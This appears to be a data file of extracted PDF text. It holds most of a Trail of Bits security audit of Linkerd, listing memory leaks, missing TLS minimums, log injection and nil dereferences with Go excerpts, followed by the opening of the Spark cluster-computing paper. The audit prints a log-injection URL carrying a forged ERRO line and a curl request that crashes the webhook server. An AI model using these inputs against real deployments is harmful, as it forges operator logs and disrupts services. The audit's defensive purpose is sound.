ational 4 \n Undetermined 2 C A T E G O R Y B R E A K D O W N \n Category Count \n Error Report ing 1 \n Timing 1 \n Data Validation 2 \n Denial of Service 3 \n Auditing and Logging 1 \n Configuration 1 \n T r a i l o f B i t s 5 Linkerd Security Assessment \n C O N F I D E N T I A L \n P r o j e c t S u m m a r y \n C o n t a c t I n f o r m a t i o n \n The following managers were associated with this project: \n Dan Guido , Account Manager Cara Pearson , Project Manager \n dan@trailofbits.com cara.pearson@trailofbits.com \n The following engineers were associated with this project: \n Alex Useche , Consultant David Pokora , Consultant \n alex.useche@trailofbits.com david.pokora@trailofbits.com \n P r o j ec t T i m el i n e \n The significant events and milestones of the project are listed below. \n Date Event \n January 27, 2022 Pre-project kickoff call \n February 7, 2022 Status update meeting #1 \n February 14, 2022 Delivery of final report draft and report readout meeting \n March 3, 2022 Delivery of final report \n T r a i l o f B i t s 6 Linkerd Security Assessment \n C O N F I D E N T I A L \n P r o j e c t G o a l s \n The engagement was scoped to provide a security assessment of the Linkerd service mesh. \n Specifically, we sought to answer the following non-exhaustive list of questions: \n ● Are Transport Layer Security (TLS) channels appropriately configured? Is Mutual TLS \n (mTLS) leveraged in a secure fashion across infrastructural components? \n ● Can the service accept connections from untrusted sources? Could an attacker \n pollute the proxy routing paths? \n ● Could the service be used to perform arbitrary message relays to other endpoints? \n ● Is the node configured properly? \n ● Are system secrets vulnerable to data exposure? \n ● Is appropriate data validation performed on server endpoints? \n ● Are metrics appropriately collected for all relevant tasks? Can this be circumvented \n in any way? \n ● Could an attacker perform log injection attacks against the application to trick \n operators into performing undesirable actions? \n ● Could an attacker with access to application containers affect the availability of the \n control plane service? \n ● Do metrics endpoints exposed by the linkerd-viz extensions leak sensitive data? \n ● Could attackers use access to linkerd-viz APIs to perform unauthorized tasks in \n control plane components? \n ● Could malicious developers with rights restricted to the application namespace \n escalate their privileges by using endpoints exposed by proxy servers and control \n plane components? \n T r a i l o f B i t s 7 Linkerd Security Assessment \n C O N F I D E N T I A L \n P r o j e c t T a r g e t s \n The engagement involved a review and testing of the targets listed below. \n l i n k e r d 2 \n Repository https://github.com/linkerd/linkerd2 \n Version Commit 68b63269d952b05cc721581dfa4672ad2e775964 \n Type Infrastructure \n Platform UNIX \n T r a i l o f B i t s 8 Linkerd Security Assessment \n C O N F I D E N T I A L \n P r o j e c t Co v e r a g e \n This section provides an overview of the analysis coverage of the review, as determined by \n our high-level engagement goals. Our approaches and their results include the following: \n ● A review of error handling throughout the codebase revealed issues regarding \n unhandled errors ( TOB-LNKD-1 ). \n ● An assessment of attack vectors that could be exploited to use Linkerd as an open \n relay did not reveal any issues. \n ● An analysis of denial-of-service vulnerabilities in the codebase revealed issues \n regarding memory leaks ( TOB-LNKD-2 , TOB-LNKD-4 , TOB-LNKD-6 ). \n ● A review of the TLS connection code revealed that TLS connections using older TLS \n protocol versions are not rejected or verified ( TOB-LNK-8 ); we identified no other \n issues in this area. \n ● Investigations into the use of cryptography outside of TLS code paths did not reveal \n any issues. \n ● An assessment of the codebase’s vulnerability to secondary issues revealed a risk of \n log injection in the TAP service ( TOB-LNKD-7 ). \n ● An analysis of network routing did not reveal any issues. \n C o v er a g e L i m i t a t i o n s \n Because of the time-boxed nature of testing work, it is common to encounter coverage \n limitations. During this project, we were unable to perform comprehensive testing of \n certain system elem ents, which may warrant further review. \n ● Due to time constraints, we could not fully cover the codebase. The issues that we \n found during this audit resulted from partial coverage of the codebase. \n T r a i l o f B i t s 9 Linkerd Security Assessment \n C O N F I D E N T I A L \n S u m m a r y o f F i n d i n g s \n The table below summarizes the findings of the review, including type and severity details. \n ID Title Type Severity \n 1 Various unhandled errors Error Reporting Undetermined \n 2 The use of time.After() in select statements can \n lead to memory leaks Timing Low \n 3 Use of string.Contains instead of string.HasPrefix \n to check for prefixes Data Validation Undetermined \n 4 Risk of resource exhaustion due to the use of \n defer inside a loop Denial of Service Inform ational \n 5 Lack of maximum request and response body \n constraint Denial of Service Inform ational \n 6 Potential goroutine leak in Kubernetes \n port-forwarding initialization logic Denial of Service Inform ational \n 7 Risk of log injection in TAP service API Auditing and \n Logging Low \n 8 TLS configuration does not enforce minimum TLS \n version Configuration Low \n 9 Nil dereference in the webhook server Data Validation Inform ational \n T r a i l o f B i t s 10 Linkerd Security Assessment \n C O N F I D E N T I A L \n D e t a i l e d F i n d i n g s \n 1 . V a r i ou s u n h a n d l e d e r r or s \n Severity: Undetermined Difficulty: High \n Type: Error Reporting Finding ID: TOB-LNKD-1 \n Target: Various \n D e s c r i p t i on \n The linkerd codebase contains various methods with unhandled errors. In most cases, \n errors returned by functions are simply not checked; in other cases, functions that \n surround deferred error-returning functions do not capture the relevant errors. \n Using gosec and errcheck , we detected a large number of such cases, which we cannot \n enumerate in this report. We recommend running these tools to uncover and resolve these \n cases. \n Figures 1.1 and 1.2 provide examples of functions in the codebase with unhandled errors: \n func (h *handler) handleProfileDownload(w http.ResponseWriter, req *http.Request, params \n httprouter.Params) { \n [...] \n w.Write(profileYaml.Bytes()) \n } \n Figure 1.1: web/srv/handlers.go#L65-L91 \n func renderStatStats(rows []*pb.StatTable_PodGroup_Row, options *statOptions) string { \n [...] \n writeStatsToBuffer(rows, w, options) \n w.Flush() \n [...] \n } \n Figure 1.2: viz/cmd/stat.go#L295-L302 \n We could not determine the severity of all of the unhandled errors detected in the \n codebase. \n E x p l oi t S c e n a r i o \n While an operator of the Linkerd infrastructure interacts with the system, an uncaught \n error occurs. Due to the lack of error reporting, the operator is unaware that the operation \n did not complete successfully, and he produces further undefined behavior. \n T r a i l o f B i t s 11 Linkerd Security Assessment \n C O N F I D E N T I A L \n R e c om m e n d a t i on s \n Short term, run gosec and errcheck across the codebase. Resolve all issues pertaining to \n unhandled errors by checking them explicitly. \n Long term, ensure that all functions that return errors have explicit checks for these errors. \n Consider integrating the abovementioned tooling into the CI/CD pipeline to prevent \n undefined behavior from occurring in the affected code paths. \n T r a i l o f B i t s 12 Linkerd Security Assessment \n C O N F I D E N T I A L \n 2 . T h e u s e o f t i m e . A f t e r ( ) i n s e l e c t s t a t e m e n t s c a n l e a d t o m e m o r y l e a k s \n Severity: Low Difficulty: High \n Type: Timing Finding ID: TOB-LNKD-2 \n Target: cli/cmd/metrics_diagnostics_util.go \n D e s c r i p t i on \n Calls to time.After in for/select statements can lead to memory leaks because the \n garbage collector does not clean up the underlying Timer object until the timer fires. A new \n timer, which requires resources, is initialized at each iteration of the for loop (and, hence, \n the select statement). As a result, many routines originating from the time.After call \n could lead to overconsumption of the memory. \n wait: \n for { \n select { \n case result := <-resultChan: \n results = append (results, result) \n case <-time.After(waitingTime): \n break wait // timed out \n } \n if atomic.LoadInt32(&activeRoutines) == 0 { \n break \n } \n } \n Figure 2.1: cli/cmd/metrics_diagnostics_util.go#L131-L142 \n R e c om m e n d a t i on s \n Short term, consider refactoring the code that uses the time.After function in \n for/select loops using tickers. This will prevent memory leaks and crashes caused by \n memory exhaustion. \n Long term, ensure that the time.After method is not used in for/select routines. \n Periodically use the Semgrep query to check for and detect similar patterns. \n R e f e r e n c e s \n ● Use with caution time.After Can cause memory leak (golang) \n ● Golang <-time.After() is not garbage collected before expiry \n T r a i l o f B i t s 13 Linkerd Security Assessment \n C O N F I D E N T I A L \n 3 . U s e o f s t r i n g . Con t a i n s i n s t e a d o f s t r i n g . H a s P r e fi x t o c h e c k f o r p r e fi x e s \n Severity: Undetermined Difficulty: Undetermined \n Type: Data Validation Finding ID: TOB-LNKD-3 \n Target: multicluster/service-mirror/events_formatting.go \n D e s c r i p t i on \n When formatting event metadata, the formatMetadata method checks whether a given \n string in the metadata map contains a given prefix. However, rather than using \n string.HasPrefix to perform this check, it uses string.Contains , which returns true \n if the given prefix string is located anywhere in the target string. \n for k, v := range meta { \n if strings.Contains(k, consts.Prefix) || strings.Contains(k, \n consts.ProxyConfigAnnotationsPrefix) { \n metadata = append(metadata, fmt.Sprintf(\"%s=%s\", k, v)) \n } \n } \n Figure 3.1: multicluster/service-mirror/events_formatting.go#L23-L27 \n R e c om m e n d a t i on s \n Short term, refactor the prefix checks to use string.HasPrefix rather than \n string.Contains . This will ensure that prefixes within strings are properly validated. \n T r a i l o f B i t s 14 Linkerd Security Assessment \n C O N F I D E N T I A L \n 4 . R i s k o f r e s ou r c e e x h a u s t i on d u e t o t h e u s e o f d e f e r i n s i d e a l o o p \n Severity: Informational Difficulty: High \n Type: Denial of Service Finding ID: TOB-LNKD-4 \n Target: pkg/healthcheck/healthcheck.go \n D e s c r i p t i on \n The runCheck function, responsible for performing health checks for various services, \n performs its core functions inside of an infinite for loop. runCheck is called with a timeout \n stored in a context object. The cancel() function is deferred at the beginning of the \n loop. Calling defer inside of a loop could cause resource exhaustion conditions because \n the deferred function is called when the function exits, not at the end of each loop. As a \n result, resources from each context object are accumulated until the end of the for \n statement. While this may not cause noticeable issues in the current state of the the \n application, it is best to call cancel() at the end of each loop to prevent unforeseen \n issues. \n func (hc *HealthChecker) runCheck(category *Category, c *Checker, observer CheckObserver) \n bool { \n for { \n ctx, cancel := context.WithTimeout(context.Background(), RequestTimeout) \n defer cancel() \n err := c.check(ctx) \n if se, ok := err.(*SkipError); ok { \n log.Debugf( \"Skipping check: %s. Reason: %s\" , c.description, se.Reason) \n return true \n } \n Figure 4.1: pkg/healthcheck/healthcheck.go#L1619-L1628 \n R e c om m e n d a t i on s \n Short term, rather than deferring the call to cancel() , add a call to cancel() at the end \n of the loop. \n T r a i l o f B i t s 15 Linkerd Security Assessment \n C O N F I D E N T I A L \n 5 . L a c k o f m a x i m u m r e q u e s t a n d r e s p o n s e b o d y c o n s t r a i n t \n Severity: Informational Difficulty: High \n Type: Denial of Service Finding ID: TOB-LNKD-5 \n Target: Various APIs \n D e s c r i p t i on \n The ioutil.ReadAll function reads from source until an error or an end-of-file (EOF) \n condition occurs, at which point it returns the data that it read. There is no limit on the \n maximum size of request and response bodies, so using ioutil.ReadAll to parse \n requests and responses could cause a denial of service (due to insufficient memory). A \n denial of service could also occur if an exhaustive resource is loaded multiple times. This \n method is used in the following locations of the codebase: \n File Purpose \n controller/heartbeat/heartbeat.go:239 Reads responses for heartbeat requests \n pkg/profiles/openapi.go:32 Reads the body of file for the profile \n command \n pkg/version/channels.go:83 Reads responses from requests for \n obtaining Linkerd versions \n controller/webhook/server.go:124 Reads requests for the webhook and \n metrics servers \n pkg/protohttp/protohttp.go:48 Reads all requests sent to the metrics \n and TAP APIs \n pkg/protohttp/protohttp.go:170 Reads error responses from the metrics \n and TAP APIs \n In the case of pkg/protohttp/protohttp.go , the readAll function can be called to \n read POST requests, making it easier for an attacker to exploit the misuse of the ReadAll \n function. \n R e c om m e n d a t i on s \n Short term, place a limit on the maximum size of request and response bodies. For \n example, this limitation can be implemented by using the io.LimitReader function. \n T r a i l o f B i t s 16 Linkerd Security Assessment \n C O N F I D E N T I A L \n Long term, place limits on request and response bodies globally in other places within the \n application to prevent denial-of-service attacks. \n T r a i l o f B i t s 17 Linkerd Security Assessment \n C O N F I D E N T I A L \n 6 . P o t e n t i a l g or ou t i n e l e a k i n K u b e r n e t e s p o r t - f o r w a r d i n g i n i t i a l i z a t i o n l o g i c \n Severity: Informational Difficulty: High \n Type: Denial of Service Finding ID: TOB-LNKD-6 \n Target: pkg/healthcheck/healthcheck.go \n D e s c r i p t i on \n The Init function responsible for initializing port-forwarding connections for Kubernetes \n causes a goroutine leak when connections succeed. This is because the failure channel \n in the Init function is set up as an unbuffered channel. Consequently, the failure \n channel blocks the execution of the anonymous goroutine in which it is used unless an \n error is received from pf.run() . Whenever a message indicating success is received by \n readChan , the Init function returns without first releasing the resources allocated by the \n anonymous goroutine, causing those resources to be leaked. \n func (pf *PortForward) Init() error { \n // (...) \n failure := make ( chan error ) \n go func () { \n if err := pf.run(); err != nil { \n failure <- err \n } \n }() \n // (...)` \n select { \n case <-pf.readyCh: \n log.Debug( \"Port forward initialised\" ) \n case err := <-failure: \n log.Debugf( \"Port forward failed: %v\" , err) \n return err \n } \n Figure 6.1: pkg/k8s/portforward.go#L200-L220 \n R e c om m e n d a t i on s \n Short term, make the failure channel a buffered channel of size 1 . That way, the \n goroutine will be cleaned and destroyed when the function returns regardless of which \n case occurs first. \n Long term, run GCatch against goroutine-heavy packages to detect the mishandling of \n channel bugs. Refer to Appendix C for guidance on running GCatch. Basic instances of this \n issue can also be detected by running this Semgrep rule . \n T r a i l o f B i t s 18 Linkerd Security Assessment \n C O N F I D E N T I A L \n 7 . R i s k o f l og i n j e c t i on i n T A P s e r v i c e A P I \n Severity: Low Difficulty: High \n Type: Auditing and Logging Finding ID: TOB-LNKD-7 \n Target: viz/tap/api/handlers.go \n D e s c r i p t i on \n Requests sent to the TAP service API endpoint, /apis/tap , via the POST method are \n handled by the handleTap method. This method parses a namespace and a name \n obtained from the URL of the request. Both the namespace and name variables are then \n used in a log statement for printing debugging messages to standard output. Because both \n fields are user controllable, an attacker could perform log injection attacks by calling such \n API endpoints with a namespace or name with newline indicators, such as \\n . \n func (h *handler) handleTap(w http.ResponseWriter, req *http.Request, p httprouter.Params) { \n namespace := p.ByName( \"namespace\" ) \n name := p.ByName( \"name\" ) \n resource := \"\" \n // (...) \n h.log.Debugf( \"SubjectAccessReview: namespace: %s, resource: %s, name: %s, user: <%s>, \n group: <%s>\" , \n namespace, resource, name, h.usernameHeader, h.groupHeader, \n ) \n Figure 7.1: viz/tap/api/handlers.go#L106-L125 \n E x p l oi t S c e n a r i o \n An attacker submits a POST request to the TAP service API using the URL \n /apis/tap.linkerd.io/v1alpha1/watch/myns\\nERRO[0000]<attacker’s log \n message>/tap , causing invalid logs to be printed and tricking an operator into falsely \n believ ing there is a failure. \n R e c om m e n d a t i on s \n Short term, ensure that all user-controlled input is sanitized before it is used in the logging \n function. Additionally, use the format specifier %q instead of %s to prompt Go to perform \n basic sanitation of strings. \n T r a i l o f B i t s 19 Linkerd Security Assessment \n C O N F I D E N T I A L \n 8 . T L S c on fi g u r a t i on d oe s n o t e n f or c e m i n i m u m T L S v e r s i o n \n Severity: Low Difficulty: High \n Type: Configuration Finding ID: TOB-LNKD-8 \n Targets: controller\\webhook\\server.go , viz\\tap\\api\\sever.go \n D e s c r i p t i on \n Transport Layer Security (TLS) is used in multiple locations throughout the codebase. In two \n cases, TLS configurations do not have a minimum version requirement, allowing \n connections from TLS 1.0 upwards. This may leave the webhook and TAP API servers \n vulnerable to protocol downgrade and man-in-the-middle attacks. \n // NewServer returns a new instance of Server \n func NewServer( \n ctx context.Context, \n api *k8s.API, \n addr, certPath string, \n handler Handler, \n component string, \n ) (*Server, error) { \n [...] \n server := &http.Server{ \n Addr: addr, \n TLSConfig: &tls.Config{}, \n } \n Figure 8.1: controller/webhook/server.go#L43-L64 \n // NewServer creates a new server that implements the Tap APIService. \n func NewServer( \n ctx context.Context, \n addr string, \n k8sAPI *k8s.API, \n grpcTapServer pb.TapServer, \n disableCommonNames bool, \n ) (*Server, error) { \n [...] \n httpServer := &http.Server{ \n Addr: addr, \n TLSConfig: &tls.Config{ \n ClientAuth: tls.VerifyClientCertIfGiven, \n ClientCAs: clientCertPool, \n }, \n } \n Figure 8.2: viz/tap/api/sever.go#L34-L76 \n T r a i l o f B i t s 20 Linkerd Security Assessment \n C O N F I D E N T I A L \n E x p l oi t S c e n a r i o \n Due to the lack of minimum TLS version enforcement, certain established connections lack \n sufficient authentication and cryptography. These connections do not protect against \n man-in-the-middle attacks. \n R e c om m e n d a t i on s \n Short term, review all TLS configurations and ensure the MinVersion field is set to require \n connections to be TLS 1.2 or newer. \n Long term, ensure that all TLS configurations across the codebase enforce a minimum \n version requirement and employ verification where possible. \n T r a i l o f B i t s 21 Linkerd Security Assessment \n C O N F I D E N T I A L \n 9 . N i l d e r e f e r e n c e s i n t h e w e b h ook s e r v e r \n Severity: Informational Difficulty: High \n Type: Data Validation Finding ID: TOB-LNKD-9 \n Target: controller/webhook/server.go \n D e s c r i p t i on \n The webhook server’s processReq function, used for handling admission review requests, \n does not properly validate request objects. As a result, malformed requests result in nil \n dereferences, which cause panics on the server. \n If the server receives a request with a body that cannot be decoded by the decode \n function, shown below, an error is returned, and a panic is triggered when the system \n attempts to access the Request object in line 154. A panic could also occur if request is \n decoded successfully into an AdmissionReview object with a missing Request property. \n In such case, the panic would be triggered in line 162. \n 149 func (s *Server) processReq(ctx context.Context, data [] byte ) \n *admissionv1beta1.AdmissionReview { \n 150 admissionReview, err := decode(data) \n 151 if err != nil { \n 152 log.Errorf( \"failed to decode data. Reason: %s\" , err) \n 153 admissionReview.Response = &admissionv1beta1.AdmissionResponse{ \n 154 UID: admissionReview.Request.UID , \n 155 Allowed: false , \n 156 Result: &metav1.Status{ \n 157 Message: err.Error(), \n 158 }, \n 159 } \n 160 return admissionReview \n 161 } \n 162 log.Infof( \"received admission review request %s\" , \n admissionReview.Request.UID ) \n 163 log.Debugf( \"admission request: %+v\" , admissionReview.Request) \n Figure 9.1: controller/webhook/server.go#L149-L163 \n We tested the panic by getting a shell on a container running in the application namespace \n and issuing the request in figure 9.2. However, the Go server recovers from the panics \n without negatively impacting the application. \n T r a i l o f B i t s 22 Linkerd Security Assessment \n C O N F I D E N T I A L \n curl -i -s -k -X $'POST' -H $'Host: 10.100.137.130:443' -H $'Accept: */*' -H \n $'Content-Length: 6' --data-binary $'aaaaaa' $'https://10.100.137.130:443/inject/test \n Figure 9.2: The curl request that causes a panic \n R e c om m e n d a t i on s \n Short term, add checks to verify that request objects are not nil before and after they are \n decoded. \n Long term, run the invalid-usage-of-modified-variable rule from the Trail of Bits \n set of Semgrep rules in the CI/CD pipeline to detect this type of bug. \n T r a i l o f B i t s 23 Linkerd Security Assessment \n C O N F I D E N T I A L \n A . V u l n e r a b i l i t y Ca t e g o r i e s \n The following tables describe the vulnerability categories, severity levels, and difficulty \n levels used in this document. \n Vulnerability Categories \n Category Description \n Access Controls Insufficient authorization or assessment of rights \n Auditing and Logging Insufficient auditing of actions or logging of problems \n Authentication Improper identification of users \n Configuration Misconfigured servers, devices, or software components \n Cryptography A breach of system confidentiality or integrity \n Data Exposure Exposure of sensitive information \n Data Validation Improper reliance on the structure or values of data \n Denial of Service A system failure with an availability impact \n Error Report ing Insecure or insufficient reporting of error conditions \n Patching Use of an outdated software package or library \n Session Management Improper identification of authenticated users \n Testing Insufficient test methodology or test coverage \n Timing Race conditions or other order-of-operations flaws \n Undefined Behavior Undefined behavior triggered within the system \n T r a i l o f B i t s 24 Linkerd Security Assessment \n C O N F I D E N T I A L \n Severity Levels \n Severity Description \n Inform ational The issue does not pose an immediate risk but is relevant to security best \n practices. \n Undetermined The extent of the risk was not determined during this engagement. \n Low The risk is small or is not one the client has indicated is important. \n Medium User information is at risk; exploitation could pose reputational, legal, or \n moderate financial risks. \n High The flaw could affect numerous users and have serious reputational, legal, \n or financial implications. \n Difficulty Levels \n Difficulty Description \n Undetermined The difficulty of exploitation was not determined during this engagement. \n Low The flaw is well known; public tools for its exploitation exist or can be \n scripted. \n Medium An attacker must write an exploit or will need in-depth knowledge of the \n system. \n High An attacker must have privileged access to the system, may need to know \n complex technical details, or must discover other weaknesses to exploit this \n issue. \n T r a i l o f B i t s 25 Linkerd Security Assessment \n C O N F I D E N T I A L \n B . Co d e Q u a l i t y F i n d i n g s \n This appendix lists code quality findings that we identified through a manual review. \n Typo in the filename viz/tap/api/sever.go . The word “sever” should be “server.” \n Use of fmt.Sprintf instead of net.JoinHostPort . In locations in which host names \n and port numbers are joined for a target URI, fmt.Sprintf calls are used to format the \n message instead of net.JoinHostPort . \n ● controller/api/destination/profile_translator.go#L120 \n ● controller/api/destination/server.go#L471 \n ● controller/api/destination/watcher/endpoints_watcher.go ( #L753 , \n #L813 ) \n ● controller/api/destination/watcher/k8s.go#L96 \n Redundant error handling in various methods. Various methods check whether an error \n is nil before returning it; however, continuing down the code path returns a nil . Instead, \n these methods could return the error whether it is nil or not. \n ● jaeger/cmd/check.go#L76-L79 \n ● multicluster/service-mirror/cluster_watcher.go#L1026-L1030 \n ● pkg/healthcheck/healthcheck.go#L1510-L1514 \n ● viz/cmd/tap.go#L306-L310 \n ● viz/pkg/healthcheck/healthcheck.go#L244-L248 \n T r a i l o f B i t s 26 Linkerd Security Assessment \n C O N F I D E N T I A L \n C . R u n n i n g G Ca t c h \n This appendix explains how to use GCatch , a tool that automatically detects concurrency \n bugs in Go. It also includes relevant output generated by GCatch when it is run over Linkerd \n (figure B.1). We omitted from the figure any output pertaining to packages in which no \n issues were detected and to packages that did not compile. Additionally, we replaced the \n prefix of the package paths ( / home/vagrant/go/src/github.com/linkerd ) with \n \" $LINKERD \" in the figure. \n To run GCatch over the Linkerd project, take the following steps: \n 1. Clone the GCatch project as a Go package. For example, if your Go root directory \n were ~/go, you would clone the repository to the following package: \n ~/go/src/github.com/system-pclub/GCatch . \n 2. Go to the GCatch/GCatch directory and run Installz3.sh and install.sh . \n 3. Install the project in the Go root directory and enter the project directory \n ( ~/go/src/github.com/linkerd/linkerd2 ). \n 4. Run GCatch by using the following command: \n GCatch -path=\"$(pwd)\" -include=github.com/linkerd/$REPO \n -checker=BMOC:unlock:double:conflict:structfield:fatal -r \n -compile-error . \n ----------Bug[1]---------- \n Type: BMOC Reason: One or multiple channel operation is blocked. \n -----Blocking at: \n File: /$LINKERD/k8s/portforward.go:207 \n -----Path NO. 0 Entry func at: (*github.com/linkerd/linkerd2/pkg/k8s.PortForward).Init \n Call :/$LINKERD/k8s/portforward.go:201:12 '✓' \n ChanMake :/$LINKERD/k8s/portforward.go:203:17 '✓' \n Go :/$LINKERD/k8s/portforward.go:205:2 '✓' \n Select :/$LINKERD/k8s/portforward.go:214:2 '✓' \n Select_case :/$LINKERD/k8s/portforward.go:214:2 '✓' \n Call :/$LINKERD/k8s/portforward.go:216:12 '✓' \n Return :/$LINKERD/k8s/portforward.go:222:2 '✓' \n -----Blocking Path NO. 1 \n Call :/$LINKERD/k8s/portforward.go:206:19 '✓' \n If :/$LINKERD/k8s/portforward.go:206:27 '✓' \n Chan_op :/$LINKERD/k8s/portforward.go:207:12 Blocking \n Jump :/$LINKERD/k8s/portforward.go:207:12 '✗' \n Return :/$LINKERD/k8s/portforward.go:207:12 '✗' \n Figure C.1: GCatch results for Linkerd \n T r a i l o f B i t s 27 Linkerd Security Assessment \n C O N F I D E N T I A L \n" } ]
{ "category": "Orchestration & Management", "file_name": "hotcloud_spark.pdf", "project_name": "Apache Mesos", "subcategory": "Scheduling & Orchestration" }
[ { "data": "Spark: Cluster Computing with Working Sets\nMatei Zaharia, Mosharaf Chowdhury, Michael J. Franklin, Scott Shenker, Ion Stoica\nUniversity of California, Berkeley\nAbstract\nMapReduce and its variants have been highly successful\nin implementing large-scale data-intensive applications\non commodity clusters. However, most of these systems\nare built around an acyclic data flow model that is not\nsuitable for other popular applications. This paper fo-\ncuses on one such class of applications: those that reuse\na working set of data across multiple parallel operations.\nThis includes many iterative machine learning algorithms,\nas well as interactive data analysis tools. We propose a\nnew framework called Spark that supports these applica-\ntions while retaining the scalability and fault tolerance of\nMapReduce. To achieve these goals, Spark introduces an\nabstraction called resilient distributed datasets (RDDs).\nAn RDD is a read-only collection of objects partitioned\nacross a set of machines that can be rebuilt if a partition\nis lost. Spark can outperform Hadoop by 10x in iterative\nmachine learning jobs, and can be used to interactively\nquery a 39 GB dataset with sub-second response time.\n1 Introduction\nA new model of cluster computing has become widely\npopular, in which data-parallel computations are executed\non clusters of unreliable machines by systems that auto-\nmatically provide locality-aware scheduling, fault toler-\nance, and load balancing. MapReduce [11] pioneered this\nmodel, while systems like Dryad [17] and Map-Reduce-\nMerge [24] generalized the types of data flows supported.\nThese systems achieve their scalability and fault tolerance\nby providing a programming model where the user creates\nacyclic data flow graphs to pass input data through a set of\noperators. This allows the underlying system to manage\nscheduling and to react to faults without user intervention.\nWhile this data flow programming model is useful for a\nlarge class of applications, there are applications that can-\nnot be expressed efficiently as acyclic data flows. In this\npaper, we focus on one such class of applications: those\nthat reuse a working set of data across multiple parallel\noperations. This includes two use cases where we have\nseen Hadoop users report that MapReduce is deficient:\n•Iterative jobs : Many common machine learning algo-\nrithms apply a function repeatedly to the same dataset\nto optimize a parameter (e.g., through gradient de-\nscent). While each iteration can be expressed as aMapReduce/Dryad job, each job must reload the data\nfrom disk, incurring a significant performance penalty.\n•Interactive analytics : Hadoop is often used to run\nad-hoc exploratory queries on large datasets, through\nSQL interfaces such as Pig [21] and Hive [1]. Ideally,\na user would be able to load a dataset of interest into\nmemory across a number of machines and query it re-\npeatedly. However, with Hadoop, each query incurs\nsignificant latency (tens of seconds) because it runs as\na separate MapReduce job and reads data from disk.\nThis paper presents a new cluster computing frame-\nwork called Spark, which supports applications with\nworking sets while providing similar scalability and fault\ntolerance properties to MapReduce.\nThe main abstraction in Spark is that of a resilient dis-\ntributed dataset (RDD), which represents a read-only col-\nlection of objects partitioned across a set of machines that\ncan be rebuilt if a partition is lost. Users can explicitly\ncache an RDD in memory across machines and reuse it\nin multiple MapReduce-like parallel operations . RDDs\nachieve fault tolerance through a notion of lineage : if a\npartition of an RDD is lost, the RDD has enough infor-\nmation about how it was derived from other RDDs to be\nable to rebuild just that partition. Although RDDs are\nnot a general shared memory abstraction, they represent\na sweet-spot between expressivity on the one hand and\nscalability and reliability on the other hand, and we have\nfound them well-suited for a variety of applications.\nSpark is implemented in Scala [5], a statically typed\nhigh-level programming language for the Java VM, and\nexposes a functional programming interface similar to\nDryadLINQ [25]. In addition, Spark can be used inter-\nactively from a modified version of the Scala interpreter,\nwhich allows the user to define RDDs, functions, vari-\nables and classes and use them in parallel operations on a\ncluster. We believe that Spark is the first system to allow\nan efficient, general-purpose programming language to be\nused interactively to process large datasets on a cluster.\nAlthough our implementation of Spark is still a proto-\ntype, early experience with the system is encouraging. We\nshow that Spark can outperform Hadoop by 10x in itera-\ntive machine learning workloads and can be used interac-\ntively to scan a 39 GB dataset with sub-second latency.\nThis paper is organized as follows. Section 2 describes\n1Spark’s programming model and RDDs. Section 3 shows\nsome example jobs. Section 4 describes our implemen-\ntation, including our integration into Scala and its inter-\npreter. Section 5 presents early results. We survey related\nwork in Section 6 and end with a discussion in Section 7.\n2 Programming Model\nTo use Spark, developers write a driver program that im-\nplements the high-level control flow of their application\nand launches various operations in parallel. Spark pro-\nvides two main abstractions for parallel programming:\nresilient distributed datasets andparallel operations on\nthese datasets (invoked by passing a function to apply on\na dataset). In addition, Spark supports two restricted types\nofshared variables that can be used in functions running\non the cluster, which we shall explain later.\n2.1 Resilient Distributed Datasets (RDDs)\nA resilient distributed dataset (RDD) is a read-only col-\nlection of objects partitioned across a set of machines that\ncan be rebuilt if a partition is lost. The elements of an\nRDD need not exist in physical storage; instead, a handle\nto an RDD contains enough information to compute the\nRDD starting from data in reliable storage. This means\nthat RDDs can always be reconstructed if nodes fail.\nIn Spark, each RDD is represented by a Scala object.\nSpark lets programmers construct RDDs in four ways:\n•From a filein a shared file system, such as the Hadoop\nDistributed File System (HDFS).\n•By“parallelizing” a Scala collection (e.g., an array)\nin the driver program, which means dividing it into a\nnumber of slices that will be sent to multiple nodes.\n•Bytransforming an existing RDD. A dataset with ele-\nments of type Acan be transformed into a dataset with\nelements of type Busing an operation called flatMap ,\nwhich passes each element through a user-provided\nfunction of type A⇒List [B].1Other transforma-\ntions can be expressed using flatMap , including map\n(pass elements through a function of type A⇒B)\nandfilter (pick elements matching a predicate).\n•By changing the persistence of an existing RDD. By\ndefault, RDDs are lazy and ephemeral. That is, par-\ntitions of a dataset are materialized on demand when\nthey are used in a parallel operation (e.g., by passing\na block of a file through a map function), and are dis-\ncarded from memory after use.2However, a user can\nalter the persistence of an RDD through two actions:\n–Thecache action leaves the dataset lazy, but hints\nthat it should be kept in memory after the first time\nit is computed, because it will be reused.\n1flatMap has the same semantics as the map in MapReduce, but map\nis usually used to refer to a one-to-one function of type A⇒Bin Scala.\n2This is how “distributed collections” function in DryadLINQ.–The save action evaluates the dataset and writes\nit to a distributed filesystem such as HDFS. The\nsaved version is used in future operations on it.\nWe note that our cache action is only a hint: if there is\nnot enough memory in the cluster to cache all partitions of\na dataset, Spark will recompute them when they are used.\nWe chose this design so that Spark programs keep work-\ning (at reduced performance) if nodes fail or if a dataset is\ntoo big. This idea is loosely analogous to virtual memory.\nWe also plan to extend Spark to support other levels of\npersistence (e.g., in-memory replication across multiple\nnodes). Our goal is to let users trade off between the cost\nof storing an RDD, the speed of accessing it, the proba-\nbility of losing part of it, and the cost of recomputing it.\n2.2 Parallel Operations\nSeveral parallel operations can be performed on RDDs:\n•reduce : Combines dataset elements using an associa-\ntive function to produce a result at the driver program.\n•collect : Sends all elements of the dataset to the driver\nprogram. For example, an easy way to update an array\nin parallel is to parallelize, map and collect the array.\n•foreach : Passes each element through a user provided\nfunction. This is only done for the side effects of the\nfunction (which might be to copy data to another sys-\ntem or to update a shared variable as explained below).\nWe note that Spark does not currently support a\ngrouped reduce operation as in MapReduce; reduce re-\nsults are only collected at one process (the driver).3We\nplan to support grouped reductions in the future using\na “shuffle” transformation on distributed datasets, as de-\nscribed in Section 7. However, even using a single re-\nducer is enough to express a variety of useful algorithms.\nFor example, a recent paper on MapReduce for ma-\nchine learning on multicore systems [10] implemented ten\nlearning algorithms without supporting parallel reduction.\n2.3 Shared Variables\nProgrammers invoke operations like map,filter andre-\nduce by passing closures (functions) to Spark. As is typi-\ncal in functional programming, these closures can refer to\nvariables in the scope where they are created. Normally,\nwhen Spark runs a closure on a worker node, these vari-\nables are copied to the worker. However, Spark also lets\nprogrammers create two restricted types of shared vari-\nables to support two simple but common usage patterns:\n•Broadcast variables : If a large read-only piece of data\n(e.g., a lookup table) is used in multiple parallel op-\nerations, it is preferable to distribute it 